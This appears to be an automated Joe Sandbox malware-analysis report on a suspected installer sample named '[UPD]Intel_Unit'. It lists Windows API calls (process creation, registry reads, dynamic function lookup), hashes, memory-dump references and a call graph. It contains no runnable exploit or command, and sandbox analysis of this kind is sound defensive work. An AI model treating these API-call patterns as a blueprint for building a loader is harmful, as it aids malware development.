                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                                              • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                              • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2883127279-0
                                                                                                                                                                                                              • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                              • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                              • String ID: !N~
                                                                                                                                                                                                              • API String ID: 623250636-529124213
                                                                                                                                                                                                              • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                              • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                              • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                              • API String ID: 3509786178-2769509956
                                                                                                                                                                                                              • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                              • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                              • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                              • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:3.7%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:59
                                                                                                                                                                                                              execution_graph 102191 f11033 102196 f168b4 102191->102196 102195 f11042 102204 f1bf73 102196->102204 102201 f169bf 102202 f11038 102201->102202 102212 f16b14 8 API calls __fread_nolock 102201->102212 102203 f30413 29 API calls __onexit 102202->102203 102203->102195 102213 f3017b 102204->102213 102206 f1bf88 102222 f3014b 102206->102222 102208 f16922 102209 f1589f 102208->102209 102237 f158cb 102209->102237 102212->102201 102214 f3014b ___std_exception_copy 102213->102214 102215 f3016a 102214->102215 102217 f3016c 102214->102217 102231 f3521d 7 API calls 2 library calls 102214->102231 102215->102206 102218 f309dd 102217->102218 102232 f33614 RaiseException 102217->102232 102233 f33614 RaiseException 102218->102233 102221 f309fa 102221->102206 102223 f30150 ___std_exception_copy 102222->102223 102224 f3016a 102223->102224 102226 f3016c 102223->102226 102234 f3521d 7 API calls 2 library calls 102223->102234 102224->102208 102227 f309dd 102226->102227 102235 f33614 RaiseException 102226->102235 102236 f33614 RaiseException 102227->102236 102230 f309fa 102230->102208 102231->102214 102232->102218 102233->102221 102234->102223 102235->102227 102236->102230 102238 f158be 102237->102238 102239 f158d8 102237->102239 102238->102201 102239->102238 102240 f158df RegOpenKeyExW 102239->102240 102240->102238 102241 f158f9 RegQueryValueExW 102240->102241 102242 f1591a 102241->102242 102243 f1592f RegCloseKey 102241->102243 102242->102243 102243->102238 102244 f136f5 102247 f1370f 102244->102247 102248 f13726 102247->102248 102249 f1372b 102248->102249 102250 f1378a 102248->102250 102287 f13788 102248->102287 102251 f13804 PostQuitMessage 102249->102251 102252 f13738 102249->102252 102254 f53df4 102250->102254 102255 f13790 102250->102255 102281 f13709 102251->102281 102258 f13743 102252->102258 102259 f53e61 102252->102259 102253 f1376f DefWindowProcW 102253->102281 102306 f12f92 10 API calls 102254->102306 102256 f13797 102255->102256 102257 f137bc SetTimer RegisterWindowMessageW 102255->102257 102261 f53d95 102256->102261 102262 f137a0 KillTimer 102256->102262 102263 f137e5 CreatePopupMenu 102257->102263 102257->102281 102264 f1374d 102258->102264 102265 f1380e 102258->102265 102319 f7c8f7 65 API calls ___scrt_fastfail 102259->102319 102268 f53dd0 MoveWindow 102261->102268 102269 f53d9a 102261->102269 102299 f13907 102262->102299 102263->102281 102271 f13758 102264->102271 102277 f53e46 102264->102277 102292 f2fcad 102265->102292 102267 f53e15 102307 f2f23c 40 API calls 102267->102307 102268->102281 102274 f53da0 102269->102274 102275 f53dbf SetFocus 102269->102275 102278 f13763 102271->102278 102279 f137f2 102271->102279 102274->102278 102282 f53da9 102274->102282 102275->102281 102277->102253 102318 f71423 8 API calls 102277->102318 102278->102253 102289 f13907 Shell_NotifyIconW 102278->102289 102304 f1381f 75 API calls ___scrt_fastfail 102279->102304 102280 f53e73 102280->102253 102280->102281 102305 f12f92 10 API calls 102282->102305 102287->102253 102288 f13802 102288->102281 102290 f53e3a 102289->102290 102308 f1396b 102290->102308 102293 f2fcc5 ___scrt_fastfail 102292->102293 102294 f2fd4b 102292->102294 102320 f161a9 102293->102320 102294->102281 102296 f2fd34 KillTimer SetTimer 102296->102294 102297 f2fcec 102297->102296 102298 f6fe2b Shell_NotifyIconW 102297->102298 102298->102296 102300 f137b3 102299->102300 102301 f13919 ___scrt_fastfail 102299->102301 102303 f159ff DeleteObject DestroyWindow 102300->102303 102302 f13938 Shell_NotifyIconW 102301->102302 102302->102300 102303->102281 102304->102288 102305->102281 102306->102267 102307->102278 102309 f13996 ___scrt_fastfail 102308->102309 102428 f15f32 102309->102428 102312 f13a1c 102314 f540cd Shell_NotifyIconW 102312->102314 102315 f13a3a Shell_NotifyIconW 102312->102315 102316 f161a9 55 API calls 102315->102316 102317 f13a50 102316->102317 102317->102287 102318->102287 102319->102280 102321 f161c6 102320->102321 102322 f162a8 102320->102322 102350 f17ad5 102321->102350 102322->102297 102325 f161e1 102355 f18577 102325->102355 102326 f55278 LoadStringW 102329 f55292 102326->102329 102328 f161f6 102330 f16203 102328->102330 102337 f552ae 102328->102337 102336 f16229 ___scrt_fastfail 102329->102336 102385 f1bed9 102329->102385 102330->102329 102331 f1620d 102330->102331 102367 f16b7c 102331->102367 102338 f1628e Shell_NotifyIconW 102336->102338 102337->102336 102339 f1bf73 8 API calls 102337->102339 102340 f552f1 102337->102340 102338->102322 102341 f552d8 102339->102341 102390 f2fe6f 51 API calls 102340->102390 102389 f7a350 9 API calls 102341->102389 102344 f55310 102346 f16b7c 8 API calls 102344->102346 102345 f552e3 102347 f17bb5 8 API calls 102345->102347 102348 f55321 102346->102348 102347->102340 102349 f16b7c 8 API calls 102348->102349 102349->102336 102351 f3017b 8 API calls 102350->102351 102352 f17afa 102351->102352 102353 f3014b 8 API calls 102352->102353 102354 f161d4 102353->102354 102354->102325 102354->102326 102356 f56610 102355->102356 102357 f18587 _wcslen 102355->102357 102392 f1adf4 102356->102392 102360 f185c2 102357->102360 102361 f1859d 102357->102361 102359 f56619 102359->102359 102363 f3014b 8 API calls 102360->102363 102391 f188e8 8 API calls 102361->102391 102365 f185ce 102363->102365 102364 f185a5 __fread_nolock 102364->102328 102366 f3017b 8 API calls 102365->102366 102366->102364 102368 f16b93 102367->102368 102369 f557fe 102367->102369 102402 f16ba4 102368->102402 102371 f3014b 8 API calls 102369->102371 102373 f55808 _wcslen 102371->102373 102372 f1621b 102376 f17bb5 102372->102376 102374 f3017b 8 API calls 102373->102374 102375 f55841 __fread_nolock 102374->102375 102377 f17bc7 102376->102377 102378 f5641d 102376->102378 102417 f17bd8 102377->102417 102427 f713c8 8 API calls __fread_nolock 102378->102427 102381 f17bd3 102381->102336 102382 f56427 102383 f56433 102382->102383 102384 f1bed9 8 API calls 102382->102384 102384->102383 102386 f1befc __fread_nolock 102385->102386 102387 f1beed 102385->102387 102386->102336 102387->102386 102388 f3017b 8 API calls 102387->102388 102388->102386 102389->102345 102390->102344 102391->102364 102393 f1ae02 102392->102393 102395 f1ae0b __fread_nolock 102392->102395 102393->102395 102396 f1c2c9 102393->102396 102395->102359 102397 f1c2dc 102396->102397 102401 f1c2d9 __fread_nolock 102396->102401 102398 f3014b 8 API calls 102397->102398 102399 f1c2e7 102398->102399 102400 f3017b 8 API calls 102399->102400 102400->102401 102401->102395 102403 f16bb4 _wcslen 102402->102403 102404 f55860 102403->102404 102405 f16bc7 102403->102405 102407 f3014b 8 API calls 102404->102407 102412 f17d74 102405->102412 102409 f5586a 102407->102409 102408 f16bd4 __fread_nolock 102408->102372 102410 f3017b 8 API calls 102409->102410 102411 f5589a __fread_nolock 102410->102411 102413 f17d8a 102412->102413 102416 f17d85 __fread_nolock 102412->102416 102414 f3017b 8 API calls 102413->102414 102415 f56528 102413->102415 102414->102416 102415->102415 102416->102408 102418 f17c1b __fread_nolock 102417->102418 102419 f17be7 102417->102419 102418->102381 102419->102418 102420 f5644e 102419->102420 102421 f17c0e 102419->102421 102423 f3014b 8 API calls 102420->102423 102422 f17d74 8 API calls 102421->102422 102422->102418 102424 f5645d 102423->102424 102425 f3017b 8 API calls 102424->102425 102426 f56491 __fread_nolock 102425->102426 102427->102382 102429 f139eb 102428->102429 102430 f15f4e 102428->102430 102429->102312 102432 f7d11f 42 API calls _strftime 102429->102432 102430->102429 102431 f55070 DestroyIcon 102430->102431 102431->102429 102432->102312 102433 f65650 102442 f2e3d5 102433->102442 102435 f65666 102436 f656e1 102435->102436 102451 f2aa65 9 API calls 102435->102451 102440 f661d7 102436->102440 102453 f83fe1 81 API calls __wsopen_s 102436->102453 102438 f656c1 102438->102436 102452 f8247e 8 API calls 102438->102452 102443 f2e3e3 102442->102443 102444 f2e3f6 102442->102444 102454 f1b4c8 8 API calls 102443->102454 102446 f2e3fb 102444->102446 102447 f2e429 102444->102447 102449 f3014b 8 API calls 102446->102449 102455 f1b4c8 8 API calls 102447->102455 102450 f2e3ed 102449->102450 102450->102435 102451->102438 102452->102436 102453->102440 102454->102450 102455->102450 102456 f11098 102461 f15fc8 102456->102461 102460 f110a7 102462 f1bf73 8 API calls 102461->102462 102463 f15fdf GetVersionExW 102462->102463 102464 f18577 8 API calls 102463->102464 102465 f1602c 102464->102465 102466 f1adf4 8 API calls 102465->102466 102478 f16062 102465->102478 102467 f16056 102466->102467 102482 f155dc 102467->102482 102468 f1611c GetCurrentProcess IsWow64Process 102470 f16138 102468->102470 102471 f16150 LoadLibraryA 102470->102471 102472 f55269 GetSystemInfo 102470->102472 102473 f16161 GetProcAddress 102471->102473 102474 f1619d GetSystemInfo 102471->102474 102473->102474 102476 f16171 GetNativeSystemInfo 102473->102476 102477 f16177 102474->102477 102475 f55224 102476->102477 102479 f1109d 102477->102479 102480 f1617b FreeLibrary 102477->102480 102478->102468 102478->102475 102481 f30413 29 API calls __onexit 102479->102481 102480->102479 102481->102460 102483 f155ea 102482->102483 102484 f1adf4 8 API calls 102483->102484 102485 f155fe 102484->102485 102485->102478 102486 f1105b 102491 f152a7 102486->102491 102488 f1106a 102522 f30413 29 API calls __onexit 102488->102522 102490 f11074 102492 f152b7 __wsopen_s 102491->102492 102493 f1bf73 8 API calls 102492->102493 102494 f1536d 102493->102494 102523 f15594 102494->102523 102496 f15376 102530 f15238 102496->102530 102499 f16b7c 8 API calls 102500 f1538f 102499->102500 102536 f16a7c 102500->102536 102503 f1bf73 8 API calls 102504 f153a7 102503->102504 102542 f1bd57 102504->102542 102507 f54be6 RegQueryValueExW 102508 f54c03 102507->102508 102509 f54c7c RegCloseKey 102507->102509 102510 f3017b 8 API calls 102508->102510 102511 f153d2 102509->102511 102520 f54c8e _wcslen 102509->102520 102512 f54c1c 102510->102512 102511->102488 102548 f1423c 102512->102548 102515 f1655e 8 API calls 102515->102520 102516 f54c44 102517 f18577 8 API calls 102516->102517 102518 f54c5e ISource 102517->102518 102518->102509 102520->102511 102520->102515 102521 f16a7c 8 API calls 102520->102521 102551 f1b329 102520->102551 102521->102520 102522->102490 102557 f522d0 102523->102557 102526 f1b329 8 API calls 102527 f155c7 102526->102527 102559 f15851 102527->102559 102529 f155d1 102529->102496 102531 f522d0 __wsopen_s 102530->102531 102532 f15245 GetFullPathNameW 102531->102532 102533 f15267 102532->102533 102534 f18577 8 API calls 102533->102534 102535 f15285 102534->102535 102535->102499 102537 f16a8b 102536->102537 102541 f16aac __fread_nolock 102536->102541 102539 f3017b 8 API calls 102537->102539 102538 f3014b 8 API calls 102540 f1539e 102538->102540 102539->102541 102540->102503 102541->102538 102543 f1bd71 102542->102543 102544 f153b0 RegOpenKeyExW 102542->102544 102545 f3014b 8 API calls 102543->102545 102544->102507 102544->102511 102546 f1bd7b 102545->102546 102547 f3017b 8 API calls 102546->102547 102547->102544 102549 f3014b 8 API calls 102548->102549 102550 f1424e RegQueryValueExW 102549->102550 102550->102516 102550->102518 102552 f1b338 _wcslen 102551->102552 102553 f3017b 8 API calls 102552->102553 102554 f1b360 __fread_nolock 102553->102554 102555 f3014b 8 API calls 102554->102555 102556 f1b376 102555->102556 102556->102520 102558 f155a1 GetModuleFileNameW 102557->102558 102558->102526 102560 f522d0 __wsopen_s 102559->102560 102561 f1585e GetFullPathNameW 102560->102561 102562 f15898 102561->102562 102563 f1587d 102561->102563 102565 f1bd57 8 API calls 102562->102565 102564 f18577 8 API calls 102563->102564 102566 f15889 102564->102566 102565->102566 102567 f155dc 8 API calls 102566->102567 102568 f15895 102567->102568 102568->102529 102569 f1dd3d 102570 f1dd63 102569->102570 102571 f619c2 102569->102571 102572 f1dead 102570->102572 102574 f3014b 8 API calls 102570->102574 102573 f61a82 102571->102573 102577 f61a26 102571->102577 102582 f61a46 102571->102582 102578 f3017b 8 API calls 102572->102578 102652 f83fe1 81 API calls __wsopen_s 102573->102652 102581 f1dd8d 102574->102581 102650 f2e6e8 206 API calls 102577->102650 102587 f1dee4 __fread_nolock 102578->102587 102579 f61a7d 102583 f3014b 8 API calls 102581->102583 102581->102587 102582->102579 102651 f83fe1 81 API calls __wsopen_s 102582->102651 102585 f1dddb 102583->102585 102584 f3017b 8 API calls 102584->102587 102585->102577 102586 f1de16 102585->102586 102626 f20340 102586->102626 102587->102582 102587->102584 102589 f1de29 102589->102579 102589->102587 102590 f61aa5 102589->102590 102591 f1de77 102589->102591 102593 f1d526 102589->102593 102653 f83fe1 81 API calls __wsopen_s 102590->102653 102591->102572 102591->102593 102594 f3014b 8 API calls 102593->102594 102595 f1d589 102594->102595 102611 f1c32d 102595->102611 102598 f3014b 8 API calls 102603 f1d66e ISource 102598->102603 102599 f1c3ab 8 API calls 102609 f1d9ac ISource 102599->102609 102602 f61f79 102655 f756ae 8 API calls ISource 102602->102655 102603->102602 102605 f61f94 102603->102605 102606 f1bed9 8 API calls 102603->102606 102608 f1d911 ISource 102603->102608 102618 f1c3ab 102603->102618 102654 f1b4c8 8 API calls 102603->102654 102606->102603 102608->102599 102608->102609 102610 f1d9c3 102609->102610 102649 f2e30a 8 API calls ISource 102609->102649 102614 f1c33d 102611->102614 102612 f1c345 102612->102598 102613 f3014b 8 API calls 102613->102614 102614->102612 102614->102613 102615 f1bf73 8 API calls 102614->102615 102616 f1bed9 8 API calls 102614->102616 102617 f1c32d 8 API calls 102614->102617 102615->102614 102616->102614 102617->102614 102619 f1c3e1 ISource 102618->102619 102620 f1c3b9 102618->102620 102619->102603 102621 f1c3c7 102620->102621 102622 f1c3ab 8 API calls 102620->102622 102623 f1c3cd 102621->102623 102624 f1c3ab 8 API calls 102621->102624 102622->102621 102623->102619 102656 f1c7e0 8 API calls ISource 102623->102656 102624->102623 102628 f20376 ISource 102626->102628 102627 f305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102627->102628 102628->102627 102629 f6632b 102628->102629 102630 f3014b 8 API calls 102628->102630 102633 f1bed9 8 API calls 102628->102633 102634 f65cdb 102628->102634 102635 f21695 102628->102635 102636 f6625a 102628->102636 102642 f2049d ISource 102628->102642 102643 f1bf73 8 API calls 102628->102643 102644 f30413 29 API calls pre_c_initialization 102628->102644 102645 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102628->102645 102646 f66115 102628->102646 102648 f20aae ISource 102628->102648 102657 f21e50 102628->102657 102667 f21990 206 API calls 2 library calls 102628->102667 102671 f83fe1 81 API calls __wsopen_s 102629->102671 102630->102628 102633->102628 102641 f1bed9 8 API calls 102634->102641 102634->102642 102637 f1bed9 8 API calls 102635->102637 102635->102642 102670 f83fe1 81 API calls __wsopen_s 102636->102670 102637->102642 102641->102642 102642->102589 102643->102628 102644->102628 102645->102628 102668 f83fe1 81 API calls __wsopen_s 102646->102668 102669 f83fe1 81 API calls __wsopen_s 102648->102669 102649->102609 102650->102582 102651->102579 102652->102579 102653->102579 102654->102603 102655->102605 102656->102619 102660 f21e6d ISource 102657->102660 102658 f22512 102663 f21ff7 ISource 102658->102663 102675 f2be08 39 API calls 102658->102675 